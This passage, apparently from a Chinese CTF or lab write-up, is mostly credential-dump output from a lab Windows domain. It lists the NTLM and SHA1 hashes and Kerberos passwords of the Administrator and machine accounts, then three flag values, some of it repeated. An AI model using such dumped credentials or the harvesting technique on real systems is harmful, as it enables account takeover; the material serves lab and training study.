         * Password : 3d a8 bc 4c cd ed 97 02 2b 9c b1 14 85 2a 37 05 22 a2 b9 07 3a 88 4e 4e 42 60 45 c2 6c 18 f1 36 1d 58 dd 69 e6 9c f5 e8 2f 4a 07 0e b2 3b 58 07 46 4d 6a 0e e3 48 10 54 ce eb 2c 77 5e 51 e1 8f e5 1a 63 8b b7 2c cb f5 08 46 2a 03 27 99 13 66 7c 7d 9b ed 48 36 0d 42 89 43 56 14 c7 b1 44 dc d0 82 ce ae 59 64 ac 8d 16 82 07 da 18 e5 1e cd e7 1c f8 b1 bb b8 65 7a d7 91 3e 59 8b 9b 0b 45 bd 30 b0 90 48 e0 e6 31 e1 85 1d 70 eb 16 0a f7 b2 dd 13 2c fc 3d d7 0a f7 70 43 13 04 4b 79 0d 44 60 28 13 dd cb 3e ae 89 9c f1 42 fb 11 54 65 9a be 2a 10 82 57 e9 d9 a8 ef 4d 2a e9 85 01 36 f8 3d 8d 66 9b 6b 58 ef 86 54 34 2b 9e 6c e9 4d c0 a7 ec 85 e7 b1 4e 54 91 af e6 d4 d9 8e 08 e9 78 ff f9 d0 45 b2 b7 14 40 2c 8a a9 a9 62 21 d2 
        ssp :   KO
        credman :

Authentication Id : 0 ; 55884 (00000000:0000da4c)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/3 7:15:12
SID               : S-1-5-90-1
        msv :
         [00000003] Primary
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * NTLM     : 5f82695a422af9105af8c29caa8406e6
         * SHA1     : 21fa78c558159124c9f55b1ab891d0426f2ee246
        tspkg :
        wdigest :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : dog.local
         * Password : 27 2d 17 f2 4b 16 db a8 ef d4 82 a5 49 dc f3 35 3e a8 d8 ad 08 73 fd 21 01 f5 2d b0 95 ec b2 5f 76 c1 ec e6 98 3f 41 54 af 9c 59 6c 6e 01 06 d3 b0 79 dc 42 c4 7f 3d a5 f3 61 ef fa 33 74 50 8c 84 9f 05 14 45 86 c0 4f 2f c6 8b 30 4f 4b 37 b4 ad 8d db ae eb 44 5d e4 39 e7 c3 be 6d f6 37 2e 41 ad 3f 35 3d a6 b8 1c e9 91 e6 f3 60 9d 21 c4 f8 9e 5f 0f 24 95 38 90 6b da 27 c0 2d 86 3a 5d 58 19 56 7f ad 68 3f 6e 4a de e2 fd 02 bd 0b af 06 3b 73 47 26 ab ce ba 72 96 ce 8f 21 1d 42 34 9a 5f 87 79 d5 20 07 63 b5 a9 ad 59 4d 96 6f 7f c8 d8 8f cd 0d 56 72 96 45 58 ad 55 66 f5 a4 6c 05 49 5b b2 fb e8 eb 5a 36 f2 9d 69 1f 69 fb b7 6f 19 43 01 43 c9 96 c4 18 73 24 52 ff 1c 15 62 3d 79 f3 6c 75 2e 38 28 07 5f 7f e0 e1 62 05 a0 
        ssp :   KO
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-MVNE1SFJ0LQ$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/3 7:15:00
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * NTLM     : 94901a951ee2d32e070982b4276eebd6
         * SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3
        tspkg :
        wdigest :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : win-mvne1sfj0lq$
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :   KO
        credman :

Authentication Id : 0 ; 27364 (00000000:00006ae4)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2024/4/3 7:12:58
SID               : 
        msv :
         [00000003] Primary
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * NTLM     : 94901a951ee2d32e070982b4276eebd6
         * SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3
        tspkg :
        wdigest :
        kerberos :
        ssp :   KO
        credman :

Authentication Id : 0 ; 40540109 (00000000:026a97cd)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/11 11:49:36
SID               : S-1-5-90-2
        msv :
         [00000003] Primary
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * NTLM     : 94901a951ee2d32e070982b4276eebd6
         * SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3
        tspkg :
        wdigest :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : dog.local
         * Password : 3d a8 bc 4c cd ed 97 02 2b 9c b1 14 85 2a 37 05 22 a2 b9 07 3a 88 4e 4e 42 60 45 c2 6c 18 f1 36 1d 58 dd 69 e6 9c f5 e8 2f 4a 07 0e b2 3b 58 07 46 4d 6a 0e e3 48 10 54 ce eb 2c 77 5e 51 e1 8f e5 1a 63 8b b7 2c cb f5 08 46 2a 03 27 99 13 66 7c 7d 9b ed 48 36 0d 42 89 43 56 14 c7 b1 44 dc d0 82 ce ae 59 64 ac 8d 16 82 07 da 18 e5 1e cd e7 1c f8 b1 bb b8 65 7a d7 91 3e 59 8b 9b 0b 45 bd 30 b0 90 48 e0 e6 31 e1 85 1d 70 eb 16 0a f7 b2 dd 13 2c fc 3d d7 0a f7 70 43 13 04 4b 79 0d 44 60 28 13 dd cb 3e ae 89 9c f1 42 fb 11 54 65 9a be 2a 10 82 57 e9 d9 a8 ef 4d 2a e9 85 01 36 f8 3d 8d 66 9b 6b 58 ef 86 54 34 2b 9e 6c e9 4d c0 a7 ec 85 e7 b1 4e 54 91 af e6 d4 d9 8e 08 e9 78 ff f9 d0 45 b2 b7 14 40 2c 8a a9 a9 62 21 d2 
        ssp :   KO
        credman :

Authentication Id : 0 ; 480371 (00000000:00075473)
Session           : Interactive from 1
User Name         : Administrator
Domain            : DOG
Logon Server      : WIN-MVNE1SFJ0LQ
Logon Time        : 2024/4/3 7:29:29
SID               : S-1-5-21-2515766443-2959740750-3575737072-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
         * SHA1     : 6aec174b0d46521c233a254120538a6bddecc0c7
         [00010000] CredentialKeys
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
         * SHA1     : 6aec174b0d46521c233a254120538a6bddecc0c7
         [00010000] CredentialKeys
         * NTLM     : 32ed87bdb5fdc5e9cba88547376818d4
         * SHA1     : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :   KO
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/3 7:15:16
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :   KO
        credman :

Authentication Id : 0 ; 55865 (00000000:0000da39)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/3 7:15:11
SID               : S-1-5-90-1
        msv :
         [00000003] Primary
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * NTLM     : 94901a951ee2d32e070982b4276eebd6
         * SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3
        tspkg :
        wdigest :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : dog.local
         * Password : 3d a8 bc 4c cd ed 97 02 2b 9c b1 14 85 2a 37 05 22 a2 b9 07 3a 88 4e 4e 42 60 45 c2 6c 18 f1 36 1d 58 dd 69 e6 9c f5 e8 2f 4a 07 0e b2 3b 58 07 46 4d 6a 0e e3 48 10 54 ce eb 2c 77 5e 51 e1 8f e5 1a 63 8b b7 2c cb f5 08 46 2a 03 27 99 13 66 7c 7d 9b ed 48 36 0d 42 89 43 56 14 c7 b1 44 dc d0 82 ce ae 59 64 ac 8d 16 82 07 da 18 e5 1e cd e7 1c f8 b1 bb b8 65 7a d7 91 3e 59 8b 9b 0b 45 bd 30 b0 90 48 e0 e6 31 e1 85 1d 70 eb 16 0a f7 b2 dd 13 2c fc 3d d7 0a f7 70 43 13 04 4b 79 0d 44 60 28 13 dd cb 3e ae 89 9c f1 42 fb 11 54 65 9a be 2a 10 82 57 e9 d9 a8 ef 4d 2a e9 85 01 36 f8 3d 8d 66 9b 6b 58 ef 86 54 34 2b 9e 6c e9 4d c0 a7 ec 85 e7 b1 4e 54 91 af e6 d4 d9 8e 08 e9 78 ff f9 d0 45 b2 b7 14 40 2c 8a a9 a9 62 21 d2 
        ssp :   KO
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-MVNE1SFJ0LQ$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/3 7:12:52
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : win-mvne1sfj0lq$
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :   KO
        credman :

全部的sessions

flag1

0E089DC1595C3447DD62519756BCC4AC20C807D116065A385200E1A06D5F827486C5C25DCEC68876B07B8B31E416996122DAA05E280DD998396F6EF573A9D40F

flag2

E6B8C928198A4F27CAF809AE6AD48F9A7E56F7CC0632726C4A444DEF3D8C6E76A9918065141F2288DF7A0E790F2B1F4B783C99C7CFF29F0DD7F384CD6014B59F

flag3?

3da8bc4ccded97022b9cb114852a370522a2b9073a884e4e426045c26c18f1361d58dd69e69cf5e82f4a070eb23b5807464d6a0ee3481054ceeb2c775e51e18fe51a638bb72ccbf508462a03279913667c7d9bed48360d4289435614c7b144dcd082ceae5964ac8d168207da18e51ecde71cf8b1bbb8657ad7913e598b9b0b45bd30b09048e0e631e1851d70eb160af7b2dd132cfc3dd70af7704313044b790d44602813ddcb3eae899cf142fb1154659abe2a108257e9d9a8ef4d2ae9850136f83d8d669b6b58ef8654342b9e6ce94dc0a7ec85e7b14e5491afe6d4d98e08e978fff9d045b2b714402c8aa9a96221d2

nType from 0

User Name : WIN-MVNE1SFJ0LQ$

Domain : DOG

Logon Server : (null)

Logon Time : 2024/4/3 7:12:52

SID : S-1-5-18

msv :

tspkg :

wdigest :

* Username : WIN-MVNE1SFJ0LQ$

* Domain : DOG

* Password : (null)

kerberos :

* Username : win-mvne1sfj0lq$

* Domain : DOG.LOCAL

* Password : (null)

ssp : KO

credman :

全部的sessions

[外链图片转存中...(img-AN9KgVtz-1727602850327)]



flag1

0E089DC1595C3447DD62519756BCC4AC20C807D116065A385200E1A06D5F827486C5C25DCEC68876B07B8B31E416996122DAA05E280DD998396F6EF573A9D40F

flag2

E6B8C928198A4F27CAF809AE6AD48F9A7E56F7CC0632726C4A444DEF3D8C6E76A9918065141F2288DF7A0E790F2B1F4B783C99C7CFF29F0DD7F384CD6014B59F

flag3?

3da8bc4ccded97022b9cb114852a370522a2b9073a884e4e426045c26c18f1361d58dd69e69cf5e82f4a070eb23b5807464d6a0ee3481054ceeb2c775e51e18fe51a638bb72ccbf508462a03279913667c7d9bed48360d4289435614c7b144dcd082ceae5964ac8d168207da18e51ecde71cf8b1bbb8657ad7913e598b9b0b45bd30b09048e0e631e1851d70eb160af7b2dd132cfc3dd70af7704313044b790d44602813ddcb3eae899cf142fb1154659abe2a108257e9d9a8ef4d2ae9850136f83d8d669b6b58ef8654342b9e6ce94dc0a7ec85e7b14e5491afe6d4d98e08e978fff9d045b2b714402c8aa9a96221d2

复制代码
相关推荐
独行soc4 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based SQL Injection)
数据库·sql·安全·渗透测试·漏洞挖掘
Clockwiseee5 小时前
php伪协议
windows·安全·web安全·网络安全
Lspecialnx_10 小时前
文件解析漏洞中间件(iis和Apache)
网络安全·中间件
学习溢出11 小时前
【网络安全】逆向工程 练习示例
网络·安全·网络安全·渗透测试·逆向工程
孤独的履行者14 小时前
入门靶机:DC-1的渗透测试
数据库·python·网络安全
Blankspace学15 小时前
Wireshark软件下载安装及基础
网络·学习·测试工具·网络安全·wireshark
CVE-柠檬i18 小时前
Yakit靶场-高级前端加解密与验签实战-全关卡通关教程
网络安全
轨迹H1 天前
kali设置中文输入法
linux·网络安全·渗透测试·kali
cr.sheeper1 天前
Vulnhub靶场Apache解析漏洞
网络安全·apache